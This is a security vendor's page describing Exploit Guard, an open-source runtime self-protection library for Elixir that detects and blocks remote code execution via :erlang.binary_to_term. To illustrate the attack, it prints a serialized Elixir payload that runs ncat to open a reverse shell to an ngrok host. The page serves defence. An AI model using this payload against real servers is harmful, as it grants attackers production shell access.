Exploit Guard - Open Source Runtime Application Self Protection (RASP) for Elixir

Exploit Guard: Open Source Runtime Application Self Protection for Elixir

Exploit Guard is an Elixir library that helps you detect when a remote code execution (RCE) attack is happening against your application at runtime. This type of tool is referred to as RASP in infosec, and is a common requirement for businesses looking to adopt a language in a high security environment (healthcare, banking, etc). Exploit Guard is available in two versions:

Paid - Through Paraxial.io Application Secure

Open Source - GitHub - paraxialio/exploit_guard: Runtime application self protection for Elixir

The code running in your application is the same for both versions. The paid version includes enterprise support, webhook notifications, and metrics recording. The library is open source out of gratitude for the Elixir community, and will hopefully increase Elixir adoption by fulfilling a common security requirement.

How It Works

Consider a vulnerable application, Potion Shop, where an attacker can submit some malicious input that is passed to :erlang.binary_to_term. This results in a malicious function being created at runtime, allowing the attacker to gain a reverse shell, the equivalent of production SSH access. For more details on how this works, see Elixir/Phoenix Security: Remote Code Execution and Serialisation.

Consider the malicious function:

exploit = fn _, _ ->  System.cmd("ncat", ["-e", "/bin/bash", "8.tcp.ngrok.io", "14544"]) end

|> :erlang.term_to_binary()
|> Base.url_encode64()

> "g3AAAAKmAiQ3HH0..."

This code will be executed on the victim server, where Potion Shop is running. This ncat command spawns a reverse shell, connecting to the attacker client. The attacker sends a base64 encoded payload containing the malicious function (g3AAAAK..), and is able to connect to the running web server:

This is very bad. The attacker now had production access to the web server, an important foothold which leads to a data breach. When :erlang.binary_to_term returns a new function at runtime, that is an important signal. Exploit Guard detects this, and when running in block mode kills the relevant process:

The reverse shell connection fails, due to Exploit Guard.

Blog post with more details - Exploit Guard: Open Source Runtime Application Self Protection for Elixir